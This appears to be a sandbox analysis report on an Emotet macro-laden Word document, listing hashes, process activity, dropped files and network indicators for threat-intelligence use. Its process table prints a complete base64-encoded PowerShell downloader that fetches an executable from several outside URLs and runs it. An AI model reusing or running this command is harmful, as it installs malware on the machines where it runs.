analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

db2682ac87baf8bf0fce33057ccbcbda5863c92f93289c220c933f3963ada679

Full analysis: https://app.any.run/tasks/80ccf887-e602-470a-9fb0-8aaf9223d5bc
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 24, 2019, 12:46:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 6 18:48:00 2019, Last Saved Time/Date: Mon May 6 18:48:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 10, Security: 0
MD5:

31E40FEED70CA587181875C5CCECD149

SHA1:

F3AD3D50C4DC86B93115753AFFA9B09E47235C37

SHA256:

DB2682AC87BAF8BF0FCE33057CCBCBDA5863C92F93289C220C933F3963ADA679

SSDEEP:

3072:V77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q3wvcE3FV/qAMDhOa:V77HUUUUUUUUUUUUUUUUUUUT52VuwvcL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powErSHell.exe (PID: 980)
    • Creates files in the user directory

      • powErSHell.exe (PID: 980)
    • PowerShell script executed

      • powErSHell.exe (PID: 980)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1372)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1372)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:06 17:48:00
ModifyDate: 2019:05:06 17:48:00
Pages: 1
Words: 1
Characters: 10
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 10
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1372"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\db2682ac87baf8bf0fce33057ccbcbda5863c92f93289c220c933f3963ada679.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
980powErSHell -e JABhAF8AOQA4ADMANAA4ADcAPQAnAGIAMgAwADEANgAyADEAMgAnADsAJABvAF8AOAAzADMAOQAyACAAPQAgACcANwAzACcAOwAkAFcAOQA4ADIAMAA3ADQAPQAnAGoAMAA1ADMANwAyACcAOwAkAFoAXwBfADIAOAAwAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABvAF8AOAAzADMAOQAyACsAJwAuAGUAeABlACcAOwAkAE4AOAA0ADcANgBfADIAPQAnAHUAMwAyADIANwAxADgAMgAnADsAJABQADkAMwA3ADYAMgA3AD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAVAAuAGAAVwBFAEIAYwBMAGAASQBgAGUAYABOAHQAOwAkAG8AMQA4ADUAOQA4AD0AJwBoAHQAdABwADoALwAvAGEAcgBiAGEAdABvAHUAcgBpAHMAbQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcABjAEMAVABHAHYAYQB5AFIAawAvAEAAaAB0AHQAcAA6AC8ALwBkAGUAdgAuAHMAawBhAHQAeQBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdgBNAGsAUwB2AGgAWABSAGQAYwAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAYwBhAGQAZQBtAHkALgBhAHAAcABzAHAAYQB0AHIAbwBsAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHIAbgB6AHcAcgBxAGQAYgB2AF8AbAB2ADIAdQAxAC0AOQAzADMAMAA2ADYAOAA4ADYALwBAAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAyAC4AaQBuAGYAbwB6AGEAcABwAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB3AHoAdwAyAHIAeABkADUAeABfADEANwA2AHYANwBqADIAZwB5AC0AMQA2ADYANAA5ADMAMQA5ADgALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBjAGgAaQByAG8ALgBsAGUAYQBkAC0AdAByAGEAYwBrAGUAcgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFkAegBQAHcASABtAGkAZgBBAC8AJwAuAFMAcABMAEkAdAAoACcAQAAnACkAOwAkAEQANgA0ADgANAA5AD0AJwBrADkANwA2ADQANwAnADsAZgBvAHIAZQBhAGMAaAAoACQARgA2ADUAXwAyAF8AMgAyACAAaQBuACAAJABvADEAOAA1ADkAOAApAHsAdAByAHkAewAkAFAAOQAzADcANgAyADcALgBkAG8AVwBOAGwAbwBhAEQAZgBpAGwARQAoACQARgA2ADUAXwAyAF8AMgAyACwAIAAkAFoAXwBfADIAOAAwACkAOwAkAFcAOAAxADAAMAA2ADgAXwA9ACcAbQAyADEAOQA4ADIAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABaAF8AXwAyADgAMAApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADMAMAA5ADcAMwApACAAewAuACgAJwBJAG4AJwArACcAdgAnACsAJwBvACcAKwAnAGsAZQAtAEkAdABlAG0AJwApACAAJABaAF8AXwAyADgAMAA7ACQAdgBfAF8AXwAwADkAOAA9ACcAUwA1ADAANgA2ADkAOABfACcAOwBiAHIAZQBhAGsAOwAkAE0ANgA5ADUAXwAzAD0AJwBPAF8AMQA1ADAAMwAxADgAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAbQAzADIAMwAxADEANwA9ACcATAA3ADQAMgA4ADEAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 350
Read events
887
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
1372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3E83.tmp.cvr
MD5:
SHA256:
980powErSHell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q7ZV8TCYUT5D33U2FV6G.temp
MD5:
SHA256:
1372WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B19FF5CEFD1DA5D0F2805A945B570C3C
SHA256:F75A592B67565D406D9D7F15EC8C276CD6D0D5E54AD5EF87413F565E44175FC9
980powErSHell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13499f.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
1372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:0EF39ED7D5341EE05DCE52BBE14D0175
SHA256:7DDCABE469829297430A0AA75EA1AF5B0D39E261E04262D813CF43E7AF3D3AD6
980powErSHell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
1372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$2682ac87baf8bf0fce33057ccbcbda5863c92f93289c220c933f3963ada679.docpgc
MD5:9CD2666326697CB950CEFD1779D9E786
SHA256:A3FB03E757CFEB5DFEC2C4A7B65694294E0C42574C83E218BE8A0D52E151D4EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
980
powErSHell.exe
GET
185.38.15.114:80
http://globalbestoutlet.su/
NL
suspicious
980
powErSHell.exe
GET
302
64.202.184.28:80
http://arbatourism.com/wp-admin/pcCTGvayRk/
US
html
211 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
980
powErSHell.exe
185.38.15.114:80
globalbestoutlet.su
YISP B.V.
NL
suspicious
980
powErSHell.exe
64.202.184.28:80
arbatourism.com
GoDaddy.com, LLC
US
suspicious

DNS requests

Domain
IP
Reputation
arbatourism.com
  • 64.202.184.28
suspicious
globalbestoutlet.su
  • 185.38.15.114
suspicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query for .su TLD (Soviet Union) Often Malware Related
No debug info